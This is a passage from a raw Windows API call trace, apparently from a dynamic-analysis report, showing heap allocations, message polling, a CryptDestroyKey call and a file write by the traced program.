hHeap=0x970000) returned 1 [0128.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2efd970 | out: hHeap=0x970000) returned 1 [0128.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ede760 | out: hHeap=0x970000) returned 1 [0128.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.821] WriteFile (in: hFile=0x2d0, lpBuffer=0x2eafc48*, nNumberOfBytesToWrite=0xf900, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2eafc48*, lpNumberOfBytesWritten=0x8cf5e4*=0xf900, lpOverlapped=0x0) returned 1 [0128.826] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.826] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.826] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0128.826] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0128.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.826] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0128.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50878, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0128.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0128.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.827] CryptDestroyKey (hKey=0xa86f90) returned 1 [0128.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0128.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0128.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0128.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0128.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0128.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0128.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0128.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0128.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0128.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0128.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0128.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0128.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0128.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0128.829] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0128.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0128.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0128.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0128.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0128.830] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0128.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0128.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.830] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0128.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0128.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0128.830] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0128.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0128.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0128.830] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0128.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0128.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0128.830] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0128.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0128.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0128.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0128.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0128.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0128.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0128.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0128.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0128.832] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.832] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0128.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0128.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0128.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0128.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0128.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.832] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0128.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0128.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0128.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0128.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0128.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0128.833] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0128.833] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0128.833] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0128.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0128.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0128.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0128.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0128.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0128.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0128.834] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0128.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0128.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0128.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0128.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0128.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0128.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0128.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0128.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0128.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0128.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0128.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0128.836] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0128.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0128.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0128.836] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0128.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0128.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0128.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0128.836] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 